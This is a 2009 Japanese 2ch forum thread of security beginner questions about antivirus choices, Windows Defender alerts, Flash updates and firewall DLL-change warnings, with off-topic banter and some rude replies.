リカバリをすることになりますた 何かデータとか全部外付けにコピーするの面倒なのですが これはしょうがないんですか? ・ブラウザのお気に入りの内容 ・2chビュアー ・バイナリいじったツール ・ゲームのデータ ・画像や音楽 全部コピーしないといかんのですか? リカバリ作業補助ツールみたいなのありますか?
面倒ならバックアップしないでリカバリすれば? 別に俺のPCじゃないし
927 :
名無しさん@お腹いっぱい。 :2009/08/09(日) 02:49:13
>>926 頭大丈夫?
君自分がレスする前に一分くらい自分のレスについて自問自答したほうが良いよ
多分リアルでの生活でもそういうところが人に嫌われてると思うからw
期待通りの回答が無くてざまぁw
>>921 > その1
ある。
> その2
ある。
ある。
931 :
名無しさん@お腹いっぱい。 :2009/08/09(日) 10:17:07
932 :
923 :2009/08/09(日) 12:29:25
早よ教えろやカスども!!!!!!!!!!!!!!!!
コントロールパネルのフォルダオプションで ・対となったファイルは両方とも表示し管理は1つのファイルとして行う ・すべてのファイルとフォルダを表示する ・保護されたオペレーションシステムは表示しない こうすれば全てのファイルが表示され どんなウイルスでもとりあえずその存在を確認することができるのでしょうか
それでもWindowsは隠し事をします。
Rootkitって怖いよね。
>>919 >>925 Winの自動実行設定をオフにしてセーフモードでPCをチェックしてみました
AVG・Spybot・WindowsDefenderすべてセーフモードでは何も検出しませんでしたが
普通に立ち上げると
>>918 と同じ症状ができます・・・・
WindowsDefenderの誤作動でしょうか?
せめてWindowsDefenderがどこで検知しているのかわかればいいのですが・・・・
>>937 SpybotとWindowsDefender(両方ともたいしたことないので)の保護機能関連設定をすべてOFFにしてから、
プログラムの追加と削除からアンインストール
「a-squared Free 4.5(←Ikarusエンジン搭載)」をインストール > Update > 通常PC起動のまま『ディープスキャン』を選択して実施
http://pc11.2ch.net/test/read.cgi/sec/1248903246/8 もし、検出があれば「検出log」をテキストだけ保存して、そのまま駆除して下さい
それでも気になるのなら
>>5 の*PC健康診断掲示板でチェックしてもらえばいいよ
939 :
名無しさん@お腹いっぱい。 :2009/08/09(日) 21:05:33
>>937 マルチポストなアンタは自分で解決しなさい。
なんで八頭は一部のサイトを直リンしてんの?
なんで八頭は機種依存文字を使うの?
>>640 Nortonスレのことか?
最近は、罠が巧妙になって(サーチエンジンハイジャックとか)るんで安全なルートを貼ってるだけだが
(*´ j`)ノシ
職場の先輩から いまどきノートンよりウィルスバスターだろ常考 みたいなこと言われたんだけどこれは事実ですか?
カスペルスキーに決まってんだろ!常考
OS再インストールしようと思ってCD-Rにデータ移していて、 セキュリティソフトを入れてない状態でインターネットに接続してダウンロードしにいくのは危険と聞いて、 セキュリティソフトもダウンロードしてきて移したんですが、 そのときに「追加の情報が添付されてますが、この情報はコピーを続行すると失われる可能性があります」と警告が出ます。 このファイルでインストールしても大丈夫なんでしょうか?
無問題
セキュリティソフト入れてても、Windows DefenderはPC起動時のスタートアップから外さないほうが良いのでしょうか?
>>950 外さなくて良いです。
某質問掲示板でもアンインストールやFIX指示は出てませんし。
動画ファイルをプレイヤーで読み込めたり 便利なフリーのソフトウェアで普通に機能しているというように 一見普通に動いているようでもその裏で個人情報を盗んでいる というウイルスについて質問があります ウイルスに感染した場合 ・Cドライブ内に何らかのファイルを作成する ・怪しいプロセスがタスクマネージャで確認すると動いている ・ブラウザを乗っ取る ・レジストリを改変する ・勝手にサーバーを立てる 上記のどの行動を行わなくともブラウザの入力履歴などの個人情報を流出させたり システムを破壊したりするようなウイルスは存在するのでしょうか? また上記以外の行動で流出、システム破壊等を行うウイルスはあるのでしょうか? 自分の使っているOSはXP HomeEdition sp2です
次スレのテンプレに「八頭禁止」、もしくは、「八頭 ◆YAGApwSaEw は信用できない回答者です」という 文章を付け加えることを提案したい。 こいつの存在は、初心者に対して迷惑にしかならん。
>>952 あります。
>>953 俺はどっちでも…
今、スレ何番目?
part121かpart122だっけ?
955 :
952 :2009/08/12(水) 02:04:59
無料のブログサービス使えばhtml知識なくても簡単にHPみたいなのを持てるし 商業利用だってできる わざわざレンタル鯖借りてタグ打ちしながら時間かけてHP作る意味なくね
また「八頭」が勝手に立てたのか!
ヴィスタですが自分のドキュメントフォルダをクリッコすると必ずパケットがうpされるんですが、何でしょうか?
次part121じゃない?
消化age
カスペルスキーオンラインスキャナがずっとメンテナンス中なんだけど いつになったら終わるの
セキュリティ初心者質問スレッドpart119 1 :XP ◆j6XP1.2wFQ :2009/05/18(月) 11:45:59 また間違えた、ということは八頭が次スレ立てたのか!
冷奴どうやって食べるのが いちばん美味い?
6面に海苔を貼り付けて 辣油をたっぷりかけて食べる
>>965 6面・・・ もみ海苔にしないのはなんで?
思いつきで試してみた
冷奴+シーチキン+めんつゆ も意外とイケる
△冷奴+シーチキン+めんつゆ ○冷奴+シーチキン+ネギ+めんつゆ
糞野郎! トボケタ事言ってるんじゃないぞぉ しかし 冷奴にキムチをのせて食べるとうまいぞ
スレ立て乙
>>957 でもちょお〜っと早いんじゃないですか。
夏バテ…
ノートン コミュニティの追跡cookieを a-squaredが撃墜してくれました♪
973 :
名無しさん@お腹いっぱい。 :2009/08/14(金) 15:05:37
>971
φ(^_^o^_^)ノシ
次スレの
>>35 抜かれる情報と言っても全然大した情報ではないので無視しとけ!
こんなのだ↓
■お客様の振込ID番号 xxxxxx
■お客様のご登録時刻 200x年xx月xx日 x時x分
■お客様のIPアドレス xxx.xxx.xxx.xxx
■お客様のリモートホスト xxxxxx.xxx.jp
■お客様のご利用プロバイダ (プロバイダの名前)
■お客様のご利用ブラウザ (ここに使用中のOSのバージョンやブラウザの種類)
■当ページ閲覧回数 x回
このような情報では、個人情報を抜くことは、まず無理。
ちなみにそのサイト行って来たけど、なんていうかページの大半がリンクになってるな。
クリックすると、「登録完了ページ」という腐ったページに飛ばされるぜ。
さらにその登録完了ページの中にある、「良くある質問」に行くと痛いことがズラリ。
セキュリティの一般論で Authenticityが成り立つということは 同時にNon-repudiationも成り立つのではないですか?
で、何が言いたいんだ その一般論とやらを100万回勉強し直せ←一般論はどこまでいっても一般論。 情報セキュリティ技術 社会心理学 TOEIC500 相当以上 ってどこかのセキュリティ○○のHPにあったが、P2Pやってる人間も抱えていたし この世界、守る側より攻撃する側が有利だと気がついていないだけに哀れだ。
>975 flashのプライバシー制御って奴っすよね。 …そのFlash Cookieってやつを、その方法で制御できるのかは知らん。 とりあえず確実な情報が入るまで待て。 >976 φ(ーpー)ノシ
【使用OS】 XP sp3 【使用ブラウザ】 IE7 【Microsoft Updateの更新の状態】 自動更新設定 Flash Playerってなくても問題ないですか?
>>980 ニコニコやyoutubeなどの動画を観ないならなくても問題ない
もし入れるなら最新のものにアップデートする事をを忘れずに
982 :
980 :2009/08/16(日) 10:20:35
>>981 レスありがとうございます。
アップデートの仕方って
すでにインストール済の人も
初めてインストールする人みたく最新のバージョンをダウンロードするってことですか?
専用のアンインストーラでアンインストール後、インストール アンインストーラはadobeのサイトにある
>>983 ありがとうございます。
ダウンロードするときって
画面の上の方にあるところ(アドオンがどうたら)と画面の下のほうだと何か違うんですか?
この辺りで次スレを立てなきゃね!
つっても、もう立ってるから次スレの案内→
>>957
消化age
常駐のトロイ監視・スパイウェア監視ソフト入れたほうがいいのでしょうか? 現在常駐はESETだけ使って、a-squaredを非常駐でたまにまわしているだけなんですが・・・・・ みなさんはどうしていますか?
>>938 >>989 a-squared Free は誤検出多すぎて、あまりすすめられないわ
たとえ検出率は高くてもあれだけ誤検出を度々出すのは非常に問題
むしろ、スパイウェア対策ソフトとしては
最近欧米でも評価されているWindowsDefenderやスーパーアンチスパイウェアなんかをすすめる
現在ウイルスバスター2009をインストールしてるんですが、WindowsDefenderも 同時に使用して問題ないでしょうか?
WindowsDefenderっていいんですか?
>>991 WindowsDefenderは非常駐だから問題ない
994 :
991 :2009/08/17(月) 01:22:51
995 :
名無しさん@お腹いっぱい。 :2009/08/17(月) 07:44:28
*.dllがネットに繋いでいるとドンドン改変されたり増えたりしているようです。 どういう仕組みで正規のものかどうかを照合するにはどうすればよいのか、 ネットの使い方の初歩について教えてください。使用OSはWIN2K SP4、Sygate PersonalFirewall、Proxomitron、Firefoxでネット環境を作っています。 SPFのログにはネットに繋がってすぐに色々な警告が出ました。これらが正常 なことかどうか、確認方法をお伺いしたいです。以下に警告文を三つ例示 します。一度はそれぞれ変更拒否を選びましたがネットへのつながりに支障が 出たので今では以下の変更や増分を許可しています。そこに不安があります。
996 :
995 以下事例例示 :2009/08/17(月) 07:45:18
Application has changed since the last time you opened it, process id: 1112 Filename: C:\Program Files\ProxN45\Proxomitron.exe The change was denied by user. ---- Modules changed: 0 ---- ---- New modules: 2 ---- C:\WINNT\system32\crtdll.dll C:\Program Files\ProxN45\zlib.dll Application has changed since the last time you opened it, process id: 324 Filename: C:\Program Files\ProxN45\Proxomitron.exe The change was denied by user. ---- Modules changed: 3 ---- C:\WINNT\system32\ADVAPI32.DLL C:\WINNT\system32\KERNEL32.DLL C:\WINNT\system32\NTDLL.DLL ---- New modules: 0 ---- Application has changed since the last time you opened it, process id: 324 Filename: C:\Program Files\ProxN45\Proxomitron.exe The change was denied by user. ---- Modules changed: 6 ---- C:\WINNT\system32\RASMAN.DLL C:\WINNT\system32\RASAPI32.DLL C:\WINNT\system32\samlib.dll C:\WINNT\system32\ADVAPI32.DLL C:\WINNT\system32\KERNEL32.DLL C:\WINNT\system32\NTDLL.DLL ---- New modules: 0 ----
1000
1001 :
1001 :
Over 1000 Thread このスレッドは1000を超えました。 もう書けないので、新しいスレッドを立ててくださいです。。。